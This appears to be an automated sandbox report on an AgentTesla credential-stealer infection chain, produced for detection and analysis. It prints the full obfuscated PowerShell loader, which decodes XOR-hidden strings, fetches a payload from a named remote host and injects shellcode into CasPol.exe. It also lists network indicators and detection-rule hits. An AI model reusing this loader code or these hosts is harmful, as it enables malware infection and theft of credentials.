BExECa8PrCSw4TeDFo7IdDFe6PaCLeDSoCVi4DiCRi9FaFGe8Sq9TuFHo9MaFGoEsa2FuCAl0LeDSj1InEHo1CoCSk0BoCPa9UnCAf0FuCpa2SpCCy4AfDup1BeCOv0FjEgu3TrCOlAUnDNo7acEKi3JoDWa0NaCDaBBaCSe6PrDSa1BeCfrCHiCudATrCSoBMyFPe5OvCMeAUpCGaCVeCopBPaDLu1UsCde0FlDhu7Sv8VeDBe8UnDBuCUg3GuCAfEHyDPi5Ur8Ne5ls8Mb1FoFAk0StCkuBWoCAa6TrCBaAUrDDr0MoDFs5MeCJu9GiCUn0Di8Of5Gt8Sk1BiEPr2DdCUdDHyCKo0UnCEu2ExCAeCSeDBl6ChCTiDQu9Dr1Ab8TeCPr8Cr9Go8As5Pl8OvDDiEPe2SpEIn1ScFEn1Wo8Va5KaETr5Ca8OmDGiFstEinEJaCUnCScBDiDUr1syFAn5WoDSt1KoDbo7ReFPr8Ln8Co9eq8Pr5ImFPrEHyFAc0ExEReCAmCsiBCoDFr1Ps9Be6Pi9Ti7VaFMi8Pa8Ov9Po8Mu5BlFPeELsFDe0MoEapCHvCAmBBlDOp1Ek9de6Ge9Un7TeFTi8Op8Ex9In8Hv5HaFSnEGaFHj0exEFiCcoCSyBSwDFl1Vi9St6St9St7RiFNr8Tm8BiCLo8Sk5Un8BaDLaFTrEReEdoCStCBiBMaDTr1AcFSi5BoDDe1NiDCo7BlFSa8Hy8SpCSe8ArCBi8EdCHi'Tr;Fe&In(na`$InGArhCaeungiriElsUnhSh7Ju)Om Di`$AmHeeoFoePrrAdeRusVi6Po;Fi`$ReDOkmEdnEniMonSkgMasFopPrrCyoLajEgeBukBetTrebarCo In=Ch FofPrkBapha Sc`$ReGGehIneNagIliPesNehPr5Un Re`$HuGObhBieStgKviNosFohPs6Re;La`$EkHreoFoeTirBoeGasPu7Sv Re=Ch KrSTemPreIkrUntVoeGenPesDibToaUtrSanHjsAp0Fo Or'Ri8mi1GgFHd6PrDSa0MeCSyEPaCseEInCde0CiDRh7KrCCoALiDGe3FiCfr0ShDEn7HyDTo1DrDIn7BeCCeEReCKaEReCSo0SkDti1AfDAf6Ta9Ov6Le8Ud5Et9Fi8Sp8ka5Dy8Yo1JoFSp2FoCSy0HoDIn7UlCMa0BoDSi7reCSe4DaDTe1Fl8TiBVaEIfCCrCKaBTrDPo3opCUvAHeCLaESeCSq0Un8TrDUnFUnEOrEReCBaCPaBvaDRe1beFNo5KoDPo1RuDEl7ViFBu8Fa9PsFEt9TeFToFcoFSpCKo0OvDSc7BrCOuABa8Ur9Om8Se5Un9An6Re9Fa0It9LtCMe8Se9Sl8Fl5Me9Pe5SkDUnDFe9Va6Pa9Kb5Kl9Bo5Ha9Fo5Pu8Sv9Bj8St5Un9Ci5PuDLaDQu9Co1Po9Ud5Va8TuCTi'Ch;an&de(Fa`$UnGCohAneLagOpiThsObhUn7Sn)Al Di`$GaHFroEneHorVgeTasSt7Si;Ha`$TiHOvoLaePurPaeGasKo8Ti In=Ha DrSKumNeeHerHytSheDenHesHobEkaArrPenRisDi0Co Af'Pe8St1UnEPa6CrCstABeDIn7seDPa7ClCWhAKeCTy7NiCSe7KvCMeAExDth7BaCDu0UnCSe0Sp8An5Ga9Pr8Ud8Om5Su8ga1QuFFo2leCSe0TeDGa7BoCRa0BeDWa7SpCSk4IgDUn1Ca8RiBafEKrCUtCJuBSuDTi3PrCRuAAsCTrEEuCSk0Un8DeDMoFSoEKuEEsCOmCCaBSuDDo1CoFBi5UbDFl1MoDUn7InFIn8He9HaFFo9DeFmaFChFErCPr0SaDPo7AlCFrAWa8Bi9Ta8Ch5Ap9Sl5KbDKiDPh9Te4Fe9No5re9Bn5Lg9Sl5Ow9An5Sk9Gy5Es8Am9Va8Su5Au9Bu5etDLoDPr9Pa6Or9Af5Fi9Ru5Ca9Ca5Uu8Si9Sp8At5Ha9Un5KaDBaDTu9op1De8tiCFl'Re;Ko&Sh(li`$NaGAnhPeePrgCoiHusSphUn7Sa)Ro Hi`$TeHstoSpeHirLaeBesSa8po;Un`$PrCRuaSyrNotLawVorThiStgCahArtUniGenFlgBe=Pa(SmGUneIntCo-OpIKltpeeTemWaPUnrSooInpDoeAgrSotKayBa Ma-SePbeaSptRehOx Bi'GoHPrKNeCPlUBi:Fo\LyPBasUdeInuRadSaaFemhobGauOnlLoaTpcParStualmSk\CykVeoRenFesXmtSqiAntSeuSttTaiUtoLunLseJelFe'Ge)Di.WaBTijHgfHesFo;Ly`$InHFloHoeMerSkeAasAn9Bl Op=Pa HoSJvmBreNerSktNoeJanKrsPabHeaTrrronYosUn0Af St'Ha8Fo1PaECuDSwCMeAFiCHe0AcDCe7ReCSe0MiDSt6Rg8Wa5Af9Mu8Ob8Pi5NoFVaEInFIn6UnDseCTuDSp6DaDWe1ChCNu0MiCGu8Ku8DeBNeEUn6AlCPlADeCSmBExDCh3PeCEv0SeDKa7crDHi1ToFTe8Sk9RdFAn9PhFFrESa3DrDAn7CeCImAHaCAn8MaENo7unCFo4UnDsk6BaCFe0Re9Ti3Fl9Fj1KaFAn6BuDSy1EnDDo7FrCLaCPoCBlBSkCPr2Re8EnDsy8Ln1AdEPi6EvCLa4kjDSl7TaDPa1OtDFi2PsDLa7NyCVeCSaCMu2SkCBeDBuDji1SkCEfCviCJaBSpCPr2Op8TaCBe'Bu;ha&He(Mi`$esGAnhNoeBlgChiShsLohFo7Sh)Ja St`$WiHMeoLaeBarBleHasCo9dv;Ty`$FrCGoagerSotFowDerLaiHagmihbetkoiPenSsgAn0Bn Ba=Ca ChSSamLoeAcrNatdueApnpasSabGaaGorBonSvsPr0Ya Bi'PoFCeEElFag6EkDDiCRaDCo6TeDAl1OvCvi0MeCRe8Sk8UdBAlFEl7FoDBl0CoCAaBAnDTr1PrCTrCFoCHe8TiCHu0or8UnBHrEstCKeCCyBTeDBo1VrCIn0meDPu7AiCItAPrDTu5RuFBe6FuCDe0FlDAn7OuDSl3LeCMaCPiCDi6DiCSo0UnDBo6Ve8syBBrEMe8EpCZo4StDSe7SaDSl6PeCElDDeCEl4HeCMe9KoFPr8Op9unFWo9GlFBlENu6FoCPaASpDma5ToDRuCSt8FlDAu8Pa1GaEOuDcuCEkACaCBu0IvDLi7KrCEl0GeDAb6Va8Is9Fa8Pa5Ko9To5Pa8Ol9Hy8Sm5Se8Ta5Fu8Be1DrFFu6MdDOv0klCUnEDiCUnEArCLi0PlDTe7trCGiASlDBa3AgCSt0puDAr7SeDCe1baDPy7prCKlEfeCJuEElCRd0TaDBa1GiDUd6Af9dr6Pe8Fe9Ja8af5Ga9Ka6as9Im0Po9AnCPa8MaCOr'in;Tr&An(Ud`$GaGWhhFleFlgReiOpsSchSa7Ov)sp En`$PrCPraBerRetSuwLerSmiUngPrhHatUniDinIjgSt0Ov;pr`$NeNMaoSonOscStoStnCrdGoiEnmEneblnSytGo2De=Ub`$LiHUloTreDirSaeFosUn.WecFioLauAnnOutMa-pi3Sm5Re9Ur;Sk`$paCBeaTorFotExwSirYaiSngmihGatKoiBankngTr1Em Ba=Bu UnSMomSgeSurRetRueFanCasTwbAmaFrrGanSusBi0St ar'AuFKoELoFev6AsDHyCNoDNa6UdDNi1BaCSt0WiCMu8Ve8ClBmuFPy7UnDBu0HyCemBStDPe1GrCopCpaCCa8CaCSc0Re8LsBHuESaCWoCPlBDiDHa1CoCpa0HiDMy7NoCSpApaDUt5CaFBo6DiCAn0MaDDe7SeDFi3UnCreCHuCBi6sqCPl0MoDhi6Ou8BuBSaESe8ThCPr4ViDKu7SnDCy6BeCNoDLaCCh4MiCFe9NiFPa8An9TaFPo9KaFReEFo6SeCWhADoDOu5NoDHoCPe8ReDTr8Sp1DrEvaDNeCbyAFoCCa0spDAs7GiCSp0UnDTo6Sk8fj9Sa8In5Ge9Sa6Fe9Ur0Th9ThCDk8cu9Co8Ba5Ov8Su1LoEDe6ruCOrApiDkl7CoDDe7SuCbuACiCHy7afCHi7GaCLuAEkDTu7UnCPi0PrCEk0Pa8Pi9Un8La5st8ud1SkEAnBChCEnASkCDoBTmCVa6ViCTeAJuCFaBVaCSt1KaCunCKiCaf8MoCMa0SeCMeBPlDSh1Et9be7In8RoCHa'Vo;Mo&Br(Tr`$FlGRehReeAigFeiTesgahPh7Wh)Fo Sh`$TeCcoaInrRetUdwForEfistgYahIbtspiUdnFagSo1St;Ed`$FrCPraNorSmtPewStrKliBdgKohCotEniPonFigAn2ba St=do stSPrmUneimrRetAdeClnStsKobBuadirDinHosDi0Tr to'Su8Br1AnCRoEfjCNo9VuCSa4MiDZo7StCFl2UkCWeFPrCSkAStDSl7WiCUn1BoCMi0Br8Bn5He9Sk8Vi8Ka5BaFInEBlFAj6InDDoCudDCi6AnDSl1InCSt0InCSy8Le8AyBTiFce7AsDNo0DeCImBAlDNo1NiCBiCSlCTi8VoCSe0Fu8ReBGaEnoCDeCOmBChDMe1TeCMa0BaDus7KeCPeAWaDFe5clFFo6BuCLa0ReDDe7NoDJe3StCHyCAlCSt6SkCDi0BeDMe6bl8AnBkoEEt8AfCAc4TiDBa7DrDSt6AhCSkDGiCLi4NoCFu9AsFSp8uj9ReFDi9RoFSuEBa2ApCKo0unDGr1HiEFi1GrCGu0diCPe9KoCJa0DeCFr2ReCUn4phDmu1DaCEp0MiEDe3ubCJoAReDbl7vaEma3SkDBa0ToCPsBSkCTy6reDPo1GhCDeCMaCTeASkCTiBUdFFo5UnCWeAEuCHoCLaCTrBAnDEr1AlCMa0ThDCh7Hi8coDfo8un1GeFTr6KeDAd0PaCPeESkCBoEhaCEk0noDRe7AeCPeAMoDGu3UnCTe0DiDim7RaDCa1HeDud7PeCTiEInCCoESiCMo0NoDSh1JoDBu6Oo9Vi6Ha8Cr9Ro8An5Tu8UvDinEKo2VuEAr1ouFLe1De8Co5PlESy5Se8CaDtaFDyEFdERvCBaCPhBBgDTo1PuFKa5UnDla1UlDJo7ToFSu8An8Sv9UnFSpEMeEDeCRaCAfBKoDAp1AfFVe5beDUn1UnDAl7DsFSc8Du8CoCLo8Ca5Kv8SnDFrFCuEElFQu3HeCPaAPrCRoCTrCIn1HaFTa8Ma8BiCIt8GuCOv8AbCMu'He;Re&St(Gr`$SpGSihBeePrgSpiFasTehJu7Ga)Gr Un`$ChCtralerHotRewUnrTeibigUnhEstSkiNonStgGa2gu;Ma`$BiCPiaUnrUntOuwAdrUniUngElhTitDiiStnMogDa3Fl Br=Li TiSCemSaeAsrBotmaeRenDesgebkyaMorFlnStsHj0Sy Mo'Gr8Wi1saCReEfiCTy9TuCTi4TiDpe7riCDm2TeCOpFMaCFrAKrDSe7GrCKr1CiCIn0Le8BaBTaEMiCcoCKrBKeDFa3DiCBrAkaCTrEBrCFu0Hj8DiDAp8Go1LoEje6ReCOmAVeDKn7FoDBo7ReCGbAOnCDe7SlCOp7HaCRaAFeDQu7PsCMe0GrCmy0Sk8Si9Ko8Et1MaEac1NoCPl8BlCBrBTbCGaCFoCVrBCoCUn2BiDPs6HeDBr5ZoDAc7WhCChACoCSpFLsCGh0BjCUsECoDLa1stCma0inDSp7Gl8SaCMa'Di;Ph&Bi(Al`$DeGAmhGreGigSkiAmsFohSa7Me)Mo To`$FaCShaMarSvtFlwDirKliBrgMahcitnaiTrnFogSu3Ta#Ga;""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8364 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C38D8DEBC0D288EAC7CFC0C6D185ECCBD1F5D1D78C89858D81EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6908C8C8BECCBD3CACEC08D81CBD0C9C98985E58D81F0D5C2D7CAD2CB8C8C8C8C898581E1C0D5D7C0D6D6CCCACBD6D5C0D7CCCAC1C0D78C8C';&($Ghegish7) $Hoeres1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Nondecorously,[Parameter(Position = 1)] [Type] $Coeliomyalgia = [Void]);$Hoeres2 = Smertensbarns0 '81EDC4DCCBC0D6859885FEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE1C0C3CCCBC0E1DCCBC4C8CCC6E4D6D6C0C8C7C9DC8D8DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE4D6D6C0C8C7C9DCEBC4C8C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69D8C8C8985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE0C8CCD18BE4D6D6C0C8C7C9DCE7D0CCC9C1C0D7E4C6C6C0D6D6F89F9FF7D0CB8C8BE1C0C3CCCBC0E1DCCBC4C8CCC6E8CAC1D0C9C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69C898581C3C4C9D6C08C8BE1C0C3CCCBC0F1DCD5C08D81E2CDC0C2CCD6CD95898581E2CDC0C2CCD6CD948985FEF6DCD6D1C0C88BE8D0C9D1CCC6C4D6D1E1C0C9C0C2C4D1C0F88C';&($Ghegish7) $Hoeres2;$Hoeres3 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E6CACBD6D1D7D0C6D1CAD78D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6938985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE6C4C9C9CCCBC2E6CACBD3C0CBD1CCCACBD6F89F9FF6D1C4CBC1C4D7C1898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres3;$Hoeres4 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E8C0D1CDCAC18D81E2CDC0C2CCD6CD97898581E2CDC0C2CCD6CD96898581E6CAC0C9CCCAC8DCC4C9C2CCC4898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres4;$Hoeres5 = Smertensbarns0 'D7C0D1D0D7CB8581EDC4DCCBC0D68BE6D7C0C4D1C0F1DCD5C08D8C';&($Ghegish7) $Hoeres5 ;}$Uncouple = Smertensbarns0 'CEC0D7CBC0C99697';$Hoeres6 = Smertensbarns0 '81F2C0D7C0D7C4D1859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D8DC3CED58581F0CBC6CAD0D5C9C08581E2CDC0C2CCD6CD918C89858DE2E1F185E58DFEECCBD1F5D1D7F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88985FEF0ECCBD19697F88C858DFEECCBD1F5D1D7F88C8C8C';&($Ghegish7) $Hoeres6;$Dmningsprojekter = fkp $Ghegish5 $Ghegish6;$Hoeres7 = Smertensbarns0 '81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69685988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898596909C898595DD96959595898595DD91958C';&($Ghegish7) $Hoeres7;$Hoeres8 = Smertensbarns0 '81E6CAD7D7CAC7C7CAD7C0C085988581F2C0D7C0D7C4D18BECCBD3CACEC08DFEECCBD1F5D1D7F89F9FFFC0D7CA898595DD949595959595898595DD96959595898595DD918C';&($Ghegish7) $Hoeres8;$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;$Hoeres9 = Smertensbarns0 '81EDCAC0D7C0D6859885FEF6DCD6D1C0C88BE6CACBD3C0D7D1F89F9FE3D7CAC8E7C4D6C09391F6D1D7CCCBC28D81E6C4D7D1D2D7CCC2CDD1CCCBC28C';&($Ghegish7) $Hoeres9;$Cartwrighting0 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D689859589858581F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D696898596909C8C';&($Ghegish7) $Cartwrighting0;$Noncondiment2=$Hoeres.count-359;$Cartwrighting1 = Smertensbarns0 'FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE6CAD5DC8D81EDCAC0D7C0D6898596909C898581E6CAD7D7CAC7C7CAD7C0C0898581EBCACBC6CACBC1CCC8C0CBD1978C';&($Ghegish7) $Cartwrighting1;$Cartwrighting2 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C0859885FEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BE8C4D7D6CDC4C9F89F9FE2C0D1E1C0C9C0C2C4D1C0E3CAD7E3D0CBC6D1CCCACBF5CACCCBD1C0D78D81F6D0CECEC0D7CAD3C0D7D1D7CECEC0D1D69689858DE2E1F185E58DFEECCBD1F5D1D7F889FEECCBD1F5D1D7F88C858DFEF3CACCC1F88C8C8C';&($Ghegish7) $Cartwrighting2;$Cartwrighting3 = Smertensbarns0 '81CEC9C4D7C2CFCAD7C1C08BECCBD3CACEC08D81E6CAD7D7CAC7C7CAD7C0C08981E1C8CBCCCBC2D6D5D7CACFC0CED1C0D78C';&($Ghegish7) $Cartwrighting3# MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • CasPol.exe (PID: 392 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: CasPol.exe PID: 392JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: CasPol.exe PID: 392JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
          Source: Joe Sandbox ViewIP Address: 185.31.121.136 185.31.121.136
          Source: global trafficHTTP traffic detected: GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
          Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49825 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.mcmprint.netnoffice
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://OowQOv.com
          Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16
          Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po
          Source: powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2457016446.0000026AAE735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: powershell.exe, 00000002.00000002.2456250636.0000026AAE70A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wNUxderhdqerb.org
          Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
          Source: unknownDNS traffic detected: queries for: b3solutionscws.com
          Source: global trafficHTTP traffic detected: GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache

          System Summary

          barindex
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il 